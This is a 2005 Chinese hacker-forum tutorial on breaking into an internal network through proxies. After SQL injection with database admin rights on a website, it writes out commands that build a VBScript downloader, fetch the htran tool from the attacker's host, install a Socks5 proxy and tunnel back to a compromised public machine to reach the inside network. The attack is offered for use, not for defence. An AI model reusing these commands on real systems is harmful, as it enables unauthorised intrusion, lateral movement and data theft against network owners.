 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 妙用代理渗透内网 | |||||
作者:LiNzi 文章来源:邪恶八进制信息安全团队 点击数: 更新时间:2005-6-18  |
|||||
|
代理在入侵里的作用-----妙用代理,渗透内网 一、踩点 主机: http://www.baidu.com/ OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21 数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网. 首页存在注入漏洞,sa登陆. 注入点: http://www.baidu.com/list.asp?id=1 二、入侵思路 1.给内网目标机装个代理服务器 2.把弄好的那个代理端口映到公网. 3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。 4.接下来就是找共享,嗅探,社会工程学等等了。 三、入侵准备 1.公网肉鸡一只:218.3.1.1 2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。 3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网) 4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25 四、入侵进行时 1.工具上传: 在nbsi下执行: echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs 然后下载工具: cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe 2.安装Socks5服务 在nbsi下执行: htran.exe -install //安装Socks5服务 htran.exe -start //启动Socks5服务 3.反弹进行时 在B上运行: htran.exe -s -listen 520 5200 //监听端口 在nbsi下执行:htran.exe -s -connect 218.3.1.1 520 3.进入内网 现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。 五、渗透内网 接下来就可以扫描,嗅探,等等,也就是后话了。 六、总结 文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。 偶的朋友可以在我的QQ硬盘里面下载动画。在我的个人文章里面。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| MS07-004漏洞利用代码 Windows代理曝设计漏洞 假代 妙用触发器有效的管理 MySQL 你妙用SSL给IIS也加一把锁 瑞星提醒慎用代理服务器 网上流行不明代理服务器地址 万网等域名代理商宣布暂停.c 危急缺陷利用代码出炉 Win20 妙用“IP地址冲突”揪出害群 流氓软件代理月赚一万 网友欲 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
